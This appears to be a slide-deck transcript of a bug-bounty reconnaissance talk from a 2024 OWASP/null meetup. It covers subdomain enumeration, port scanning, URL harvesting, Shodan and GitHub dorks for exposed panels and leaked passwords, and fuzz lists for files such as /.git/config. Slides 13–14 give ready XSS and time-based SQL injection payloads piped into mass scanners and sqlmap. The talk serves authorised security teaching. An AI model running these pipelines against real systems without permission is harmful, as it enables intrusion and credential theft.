Talk on "Recon Resurgence: Level up your Recon skills for Maximum impact in Bug-Bounty" by "Agnibha Dutta" at null/OWASP Kolkata Meetup on 27 January 2024

1. Recon Resurgence: Level up your Recon skills
for Maximum impact in Bug-Bounty

2. WHOAMI?
Security Analyst at Mithra Consulting
Pursuing MBBS
Part-time Bug bounty hunter
CyberSecurity Trainer & Mentor
Agnibha Dutta
Y0gi
eJPT Certified
Successfully Hacked and Secured:
Sony
Acronis
NASA + 20 other companies
https://twitter.com/AnonY0gi
https://www.youtube.com/@y0gisec
https://www.linkedin.com/in/y0gi/

3. WHAT IS RECONNAISSANCE?
The Reconnaissance is one of the most important aspect of
penetration testing. Its also known as Recon.
Recon will help you to increase attack surface area and may allow you
to get more vulnerabilities but ultimate goal is to dig deep in the target
Recon = Increase in Attack surface = More vulnerabilities
Recon = Finding untouched endpoints = Less duplicates
Recon = Sharpening your axe before attack

4. SUBDOMAIN ENUMERATION
Subdomain enumeration is the process of finding subdomains
for one or more domain.
Tools used:
Visual Recon: VirusTotal, subdomainfinder.c99.nl
https://crt.sh/?q=%25.target.com
https://securitytrails.com/list/apex_domain/target.com
https://www.shodan.io/search?query=Ssl.cert.subject.CN%3A%22t arget.com%22
Amass
Dnsx
Subfinder
Chaos
AssetFinder

5. SUBDOMAIN ENUMERATION
amass enum -passive -norecursive -noalts -df domians.txt -o subs-list.txt
dnsx -silent -d $domain -w ~/wordlist.txt -o ~/dnsbrute.txt
cat domain.txt | dnsgen - | massdns -r ~/resolvers.txt -o S -w alive.txt

6. FILTERING THE SUBDOMAINS WITH HTTPX
httpx -l domain.txt -timeout 13 -o domain-probe.txt
PORT SCANNING
naabu -list sub-list.txt -top-ports 1000 -exclude-ports 80,443,21,22,25 -o ports.txt
naabu -list sub-list.txt -p - -exclude-ports 80,443,21,22,25 -o ports.txt
cat domain-subs.txt | aquatone -ports xlarge -scan-timeout 300 -out aquatone.txt
HEDnsExtractor -target 20.216.181.67 -only-domains -silent | httpx -title -tech-detect -
status-code -silent

7. SUBDOMAIN OF SUBDOMAIN ENUMERATION
One of the rare things people search of.
Tools used:
Subbrute: https://github.com/TheRook/subbrute
altdns: https://github.com/infosec-au/altdns
Usage: ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt

8. FINDING LOGIN PANEL FROM URLS
Extract login panel from a list of urls for further testing .
Tools used:
https://github.com/Mr-Robert0/Logsensor

9. BROADENING YOUR SCOPE
More targets lead to more option which ultimately lead to more opportunities.
Crunchbase
bgp.he.net
tools.whoisxmlapi.com
https://whois.arin.net

10. WHAT TO DO AFTER
ENUMERATION? | Collecting URLs
Waybackurls: https://github.com/tomnomnom/waybackurls
Gau: https://github.com/lc/gau
for i in $(cat domain-subs.txt);do gau $i | egrep -vE ".(woff | woff2 | ttf | toff | eot | webp | gif
| tiff | bmp | wav | png | jpg | jpeg | svg | ico | css | mp4 | m4v)" | httpx -silent -fc 404 | tee -a
domain-archive.txt;done
https://web.archive.org/cdx/search/cdx?url=*.target.com&fl=original&collapse= urlkey

11. After collecting URLs, curl out the responses of the URLs and grep
for the following URLs:
drive.google
docs.google
/spreadsheets/d/
/document/d/
TIPS AND TRICKS
By Aditya_Shende
cat domains.txt | katana -silent | while read url; do cu=$(curl -s $url | grep -E '(drive. google |
docs. google | spreadsheet/d | document./d/)';echo -e "==> $url" "n"" $cu"; done

12. TIPS AND TRICKS
Alien Vault OTX (otx.alienvault.com)
Collect Endpoints : https://github.com/xnl-h4ck3r/waymore
Common Crawl (index.commoncrawl.org)
URLScan (urlscan.io)

13. Using paramspider, gxss to detect Cross-site Scripting (XSS)
cat params | qsreplace yogi | dalfox pipe --mining-dom --deep-domxss --mining-dict --remote-
payloads=portswigger,payloadbox --remote-wordlists=burp,assetnote -o xssoutput.txt
cat alive.txt | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' |
airixss -payload "confirm(1)" | tee xssBug3.txt
TIPS AND TRICKS
Using SQLidetector to search for sqli
Tool Link: https://github.com/eslam3kl/SQLiDetector

14. https://github.com/xforcered/SQLRecon
TIPS AND TRICKS
SQLi Time Based Tips
cat urls.txt | grep "=" | qsreplace "1 AND (SELECT 5230 FROM
(SELECT(SLEEP(10)))SUmc)" > blindsqli.txt
cat blindsqli.txt | parallel -j50 -q curl -o /dev/null -s -w %
{time_total}n
Header Based SqLi: https://github.com/SAPT01/HBSQLI
subfinder -dL domains.txt | dnsx | waybackurl | uro | grep "?" | head -20 | httpx -silent >
urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt

15. Shodan: https://www.shodan.io/
SHODAN FOR RECON
Shodan Dork:
ssl:"target[.]com" 200 http.title:"dashboard" --unauthenticated dashboard
org:"target.com" x-jenkins 200 --- unauthenticated jenkins server
ssl:"target.com" 200 proftpd port:21 --- proftpd port:21 org:"target.com"
http.html:zabbix --- CVE-2022-24255 Main & Admin Portals: Authentication
Bypass org:"target.com" http.title:"phpmyadmin" ----php my admin
ssl:"target.com" http.title:"BIG-IP ---F5 BIG-IP using CVE-2020-5902
Use Shodan in combination with Fofa & use exploit .

16. Censys: https://www.censys.io/
CENSYS, ZOOMEYE
Zoomeye: https://www.zoomeye.org/
Tip: http.favicon.hash:xxxxxxxxxx

17. ffuf: https://github.com/ffuf/ffuf
FUZZING FOR SENSITIVE FILES & DIRECTORIES
FFUF-ing RECON Writeup on FFuf
for i in `cat host.txt`; do ffuf -u $i/FUZZ -w wordlist.txt -mc 200,302,401 -se ;done
Tip: Fuzz for "/wp-content/debug.log" || Sometimes they contain SQL error, which can be chained.

18. /.git/config
/docker-compose.yml
/wp-admin/admin-ajax.php?action=<text>wp-json/wp/v2/users/
/wp-content/plugins/contact-form-7/readme.txt
/https://:80?@evil
/common/config.php.new
ADD THESE IN YOUR FUZZING LIST

19. y0gi.hacklido.com
y0gi.hacklido.com /y0gi.zip - hacklido.zip – admin.zip – backup.zip
y0gi.hacklido.com/y0gi/y0gi.zip - hacklido.zip – admin.zip – backup.zip
y0gi. hacklido.com/hacklido/y0gi.zip - hacklido.zip – admin.zip – backup.zip
y0gi. hacklido.com/admin/y0gi.zip - hacklido.zip – admin.zip – backup.zip
FINDING SOURCE/BACKUP FILES
Tool: https://github.com/musana/fuzzuli
Credit: GodfatherOrwa

20. Trivial Tricks:
Find Sensitive Data in Cloud storage:
site:http://s3.amazonaws.com "target[.]com"
site:http://blob.core.windows.net "target[.]com"
site:http://googleapis.com "target[.]com"
site:http://drive.google.com "target[.]com"
Github Leaks for AWS, Jira, Okta, etc:
Org:"target" pwd/pass/passwd/password
"target.atlassian" pwd/pass/passwd/password
"target.okta" pwd/pass/passwd/password
"Jira.target" pwd/pass/passwd/password
Also search in Google groups, Gitlabs.
GOOGLE & GITHUB DORKING

21. Grep all urls from wayback or gau.
Collect all js file ".js"
Filter js file: " httpx -content-type | grep 'application/javascript'"
Perform Nuclei scan "nuclei -t /root/nuclei-templates/exposures/"
JAVASCRIPT[JS] FILES RECON
Js Recon Tip:
Collect all endpoints from Js files & Create a wordlist from those.
Craft a POST request with any parameter.
Use that request to fuzz for sensitive directory.
Tools:
JSFSCAN , Jsminer {Burp Extension} , Trufflehog

22. JAVASCRIPT[JS] FILES RECON
Using Bambdas for js analysis:
One Liner : echo targetdomain[.]com | gau | grep ".js" | httpx -content-type | grep
'application/javascript'" | awk '{print $1}' | nuclei -t /root/nuclei-
templates/exposures/ -silent > secrets.txt

23. Verify Data
Some data are intended, No bug here.
Reported > Invalid
Don't get angry, You may lose bonds with good program
Yes, They do accept Third Party
Your crafting and exploits are gold. Make it high as you can
Be humble with Program
Money going no where. Don't message constant to team

24. QNA SESSION
https://twitter.com/AnonY0gi
https://www.youtube.com/@y0gisec
https://www.linkedin.com/in/y0gi/

25. THANK YOU